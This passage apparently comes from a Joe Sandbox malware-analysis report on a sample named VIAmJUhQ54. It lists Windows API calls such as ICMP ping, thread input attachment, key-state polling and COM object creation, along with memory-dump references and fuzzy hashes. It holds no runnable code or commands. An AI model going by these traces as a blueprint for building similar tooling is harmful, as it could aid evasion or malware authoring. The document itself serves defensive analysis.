                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 830647256-0
                                                                                • Opcode ID: f4fe3e734645a227a561c852159b48bf2aaab94c297b415fbabcda0ba71b514c
                                                                                • Instruction ID: 7ad46b941d0999e653849d025e1e8704f0bd7fe8dfc90b49ee08a09e84a9d05c
                                                                                • Opcode Fuzzy Hash: f4fe3e734645a227a561c852159b48bf2aaab94c297b415fbabcda0ba71b514c
                                                                                • Instruction Fuzzy Hash: D4618B75A40248EFDB20DFA8CC81EFE77B8EB09700F144199FA05AB291D778AD41DB64
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 007594FE
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00759549
                                                                                • VariantInit.OLEAUT32(?), ref: 0075955B
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0075957B
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 007595BE
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 007595D2
                                                                                • VariantClear.OLEAUT32(?), ref: 007595E7
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 007595F4
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007595FD
                                                                                • VariantClear.OLEAUT32(?), ref: 0075960F
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0075961A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: fd830d6ee31edb65a2b0b3dd9abf46d9f93706bd2a238e3686e5d702c451f9c7
                                                                                • Instruction ID: 9e6566174d2a3a4a064a2e3054acbb468464bab9a6913d4049b2820586662908
                                                                                • Opcode Fuzzy Hash: fd830d6ee31edb65a2b0b3dd9abf46d9f93706bd2a238e3686e5d702c451f9c7
                                                                                • Instruction Fuzzy Hash: DB418D70900219EFCB11EFA4DC489DEBF79FF48311F008025F902A3251EB78AA49CBA1
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$_memset
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?}$|?}
                                                                                • API String ID: 2862541840-1857323503
                                                                                • Opcode ID: b33f2feb16f40cb9bba1179856c1b6b95c53d1026a9e08c51b310b7d1a338668
                                                                                • Instruction ID: 91b0994443a03e6110ec44fd41fec46ba921d727f78260b667190aa42404020a
                                                                                • Opcode Fuzzy Hash: b33f2feb16f40cb9bba1179856c1b6b95c53d1026a9e08c51b310b7d1a338668
                                                                                • Instruction Fuzzy Hash: 1B91A271A00219EBDF24CF94C848FAEB7B8EF85750F10C55AF919AB281D7789940CFA0
                                                                                APIs
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                • CoInitialize.OLE32 ref: 0077ADF6
                                                                                • CoUninitialize.OLE32 ref: 0077AE01
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,007AD8FC,?), ref: 0077AE61
                                                                                • IIDFromString.OLE32(?,?), ref: 0077AED4
                                                                                • VariantInit.OLEAUT32(?), ref: 0077AF6E
                                                                                • VariantClear.OLEAUT32(?), ref: 0077AFCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 834269672-1287834457
                                                                                • Opcode ID: 700044648e725b9c365a9cd11fa71c04dfa86000e2148e3b7fb0b0c5fdca3e50
                                                                                • Instruction ID: e8838ae648e60761f0fbf5477f378e2f310c262601bda531f740b7b3ff68cbc9
                                                                                • Opcode Fuzzy Hash: 700044648e725b9c365a9cd11fa71c04dfa86000e2148e3b7fb0b0c5fdca3e50
                                                                                • Instruction Fuzzy Hash: A1619D70208311EFEB10DF54C849B6EB7E8AF89754F108519F98A9B291C778ED44CB93
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00778168
                                                                                • inet_addr.WSOCK32(?), ref: 007781AD
                                                                                • gethostbyname.WSOCK32(?), ref: 007781B9
                                                                                • IcmpCreateFile.IPHLPAPI ref: 007781C7
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00778237
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0077824D
                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007782C2
                                                                                • WSACleanup.WSOCK32 ref: 007782C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: 69612c911f0b98fff04fbeb662c526f9f0a4c9c1521cae3e82c78ad1dd68a68f
                                                                                • Instruction ID: 221c98cb72144fb3d2a0f2d32c92d0e63869488062a2149baee0717ad67fb754
                                                                                • Opcode Fuzzy Hash: 69612c911f0b98fff04fbeb662c526f9f0a4c9c1521cae3e82c78ad1dd68a68f
                                                                                • Instruction Fuzzy Hash: FF5181316447009FDB60AF24DC49B6A77E4BF49361F04C929F95ADB2A2DB38ED05CB42
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0076E396
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0076E40C
                                                                                • GetLastError.KERNEL32 ref: 0076E416
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0076E483
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: bfee57dd2c858660e2554cd895ce50b30592a052570a08d88ae0accd250337e7
                                                                                • Instruction ID: 47a51595ed7efbefb222a993a6be2430f632c8ddc6eda1bed0b5207452d744de
                                                                                • Opcode Fuzzy Hash: bfee57dd2c858660e2554cd895ce50b30592a052570a08d88ae0accd250337e7
                                                                                • Instruction Fuzzy Hash: 45319479A00249EFDB11EB64D849AAD7BB4EF45300F148026F907EB2D1DB789D05C7A1
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0075B98C
                                                                                • GetDlgCtrlID.USER32 ref: 0075B997
                                                                                • GetParent.USER32 ref: 0075B9B3
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0075B9B6
                                                                                • GetDlgCtrlID.USER32(?), ref: 0075B9BF
                                                                                • GetParent.USER32(?), ref: 0075B9DB
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0075B9DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
                                                                                • Opcode ID: 6bf173066ce845a347d8cc1f83d1aa9b7ca1269c5b26809e77210eb82054d058
                                                                                • Instruction ID: c9a1529c743792fc22eee15946f49edf3ff9e098dca6f44cc4470be901b9b3d1
                                                                                • Opcode Fuzzy Hash: 6bf173066ce845a347d8cc1f83d1aa9b7ca1269c5b26809e77210eb82054d058
                                                                                • Instruction Fuzzy Hash: CF21C4B4900104FFDB05ABA0DC85EFEB774EB96300B104119F95293291DBBC5C19DB24
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0075BA73
                                                                                • GetDlgCtrlID.USER32 ref: 0075BA7E
                                                                                • GetParent.USER32 ref: 0075BA9A
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0075BA9D
                                                                                • GetDlgCtrlID.USER32(?), ref: 0075BAA6
                                                                                • GetParent.USER32(?), ref: 0075BAC2
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0075BAC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
                                                                                • Opcode ID: 5a9cb8f6d1a7d2353a2123167cf9b1ffbf9d8895dabe566cbf035bb779c7c86a
                                                                                • Instruction ID: c39813a77d70460db35142d8c76cdd801825cd118fd0d15ebb54bc99f8a18d80
                                                                                • Opcode Fuzzy Hash: 5a9cb8f6d1a7d2353a2123167cf9b1ffbf9d8895dabe566cbf035bb779c7c86a
                                                                                • Instruction Fuzzy Hash: A921C1B4900108BFDB15ABA0CC85EFEB774EF55300F108015F95293291DBBD4C1A9B24
                                                                                APIs
                                                                                • GetParent.USER32 ref: 0075BAE3
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 0075BAF8
                                                                                • _wcscmp.LIBCMT ref: 0075BB0A
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0075BB85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1704125052-3381328864
                                                                                • Opcode ID: cb8ebbb86990051580ad6b1514571bd50747e147da6715b73b8fd22371a228d0
                                                                                • Instruction ID: 075e912d7e0eee5c458d821a6d882f56ca958d2806b60cfec2578f860fef6e6a
                                                                                • Opcode Fuzzy Hash: cb8ebbb86990051580ad6b1514571bd50747e147da6715b73b8fd22371a228d0
                                                                                • Instruction Fuzzy Hash: 2C11E3B6608707F9FA2466349C0ADF637ACDB61360B204022FE05E40D6EBED686A4954
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0077B2D5
                                                                                • CoInitialize.OLE32(00000000), ref: 0077B302
                                                                                • CoUninitialize.OLE32 ref: 0077B30C
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 0077B40C
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 0077B539
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0077B56D
                                                                                • CoGetObject.OLE32(?,00000000,007AD91C,?), ref: 0077B590
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 0077B5A3
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0077B623
                                                                                • VariantClear.OLEAUT32(007AD91C), ref: 0077B633
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2395222682-0
                                                                                • Opcode ID: bddffd7f6728aa8c66bc8b7a6a47c8404d3808ab8c373cd67933f82424fa8752
                                                                                • Instruction ID: 4d4e17dfb9d0d805ec83f79afc4cdd77a9e8d48317e230d2b3bc737c184dbf21
                                                                                • Opcode Fuzzy Hash: bddffd7f6728aa8c66bc8b7a6a47c8404d3808ab8c373cd67933f82424fa8752
                                                                                • Instruction Fuzzy Hash: 71C111B1608304AFCB10DF64C884A6AB7E9FF89344F00891DF98ADB251DB79ED05CB52
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00764047
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007630A5,?,00000001), ref: 0076405B
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00764062
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007630A5,?,00000001), ref: 00764071
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00764083
                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007630A5,?,00000001), ref: 0076409C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007630A5,?,00000001), ref: 007640AE
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007630A5,?,00000001), ref: 007640F3
                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007630A5,?,00000001), ref: 00764108
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007630A5,?,00000001), ref: 00764113
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: 31198d46f1a0b4c7e2bc880e5e01e39c081b31f5ad8bc426a811bcaabea03556
                                                                                • Instruction ID: 2955603112374d50448b31ed0a730c0b51242ed43fc9468db6e9afb1fc584501
                                                                                • Opcode Fuzzy Hash: 31198d46f1a0b4c7e2bc880e5e01e39c081b31f5ad8bc426a811bcaabea03556
                                                                                • Instruction Fuzzy Hash: BD31C3B1501218AFDB25DF54DC8DB6977B9AB96351F20C105FD06DB2A0CBBCDD808B68
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 0073B496
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0073B4A0
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0073B4B5
                                                                                • GetStockObject.GDI32(00000005), ref: 0073B4BD
                                                                                • GetClientRect.USER32(?), ref: 0079DD63
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0079DD7A
                                                                                • GetWindowDC.USER32(?), ref: 0079DD86
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0079DD95
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0079DDA7
                                                                                • GetSysColor.USER32(00000005), ref: 0079DDC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 3430376129-0
                                                                                • Opcode ID: 904facd8269a0cfb5aa7a054ad7287d0f8f69cc462a2be7d421a571b9b92faa6
                                                                                • Instruction ID: 66d61ac676826a6a2a716144267dd4a96713e83f78a5c62fda5f09a37fa56ccf
                                                                                • Opcode Fuzzy Hash: 904facd8269a0cfb5aa7a054ad7287d0f8f69cc462a2be7d421a571b9b92faa6
                                                                                • Instruction Fuzzy Hash: F2118E31500245EFEB316FB4EC08BE93B61EB46321F11C225FA66954E2DB390D51DF24
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007230DC
                                                                                • CoUninitialize.OLE32(?,00000000), ref: 00723181
                                                                                • UnregisterHotKey.USER32(?), ref: 007232A9
                                                                                • DestroyWindow.USER32(?), ref: 00795079
                                                                                • FreeLibrary.KERNEL32(?), ref: 007950F8
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00795125
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                • String ID: close all
                                                                                • API String ID: 469580280-3243417748
                                                                                • Opcode ID: c2a961d7ad06c5264459d768485531a31e58907d1adb3501f13ae84447bba885
                                                                                • Instruction ID: 6cdedf297f39716ea95dca1c5e744f0a4e74eb7454b1ba824a53b723469bcf54
                                                                                • Opcode Fuzzy Hash: c2a961d7ad06c5264459d768485531a31e58907d1adb3501f13ae84447bba885
                                                                                • Instruction Fuzzy Hash: 90913E70600226CFC716EF24E899E68F3B4FF15304F5481A9E50A67662DB3CAE66CF54
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 0073CC15
                                                                                  • Part of subcall function 0073CCCD: GetClientRect.USER32(?,?), ref: 0073CCF6
                                                                                  • Part of subcall function 0073CCCD: GetWindowRect.USER32(?,?), ref: 0073CD37
                                                                                  • Part of subcall function 0073CCCD: ScreenToClient.USER32(?,?), ref: 0073CD5F
                                                                                • GetDC.USER32 ref: 0079D137
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0079D14A
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0079D158
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0079D16D
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0079D175
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0079D200
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: 45be8cb6db53f26231e5f6ea5dc51d78dd71e922d2c79d4f412af9681330ee58
                                                                                • Instruction ID: c7f3d6295831a63a4cd8beb458796ddd548552632b2982ca09115ccbcf609552
                                                                                • Opcode Fuzzy Hash: 45be8cb6db53f26231e5f6ea5dc51d78dd71e922d2c79d4f412af9681330ee58
                                                                                • Instruction Fuzzy Hash: ED71E031400209DFDF329F68EC85AEA7BB5FF49350F148269ED566A2A6C7398C41DF60
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                  • Part of subcall function 0073B63C: GetCursorPos.USER32(000000FF), ref: 0073B64F
                                                                                  • Part of subcall function 0073B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0073B66C
                                                                                  • Part of subcall function 0073B63C: GetAsyncKeyState.USER32(00000001), ref: 0073B691
                                                                                  • Part of subcall function 0073B63C: GetAsyncKeyState.USER32(00000002), ref: 0073B69F
                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0078ED3C
                                                                                • ImageList_EndDrag.COMCTL32 ref: 0078ED42
                                                                                • ReleaseCapture.USER32 ref: 0078ED48
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0078EDF0
                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0078EE03
                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0078EEDC
                                                                                Strings
                                                                                Memory Dump Source
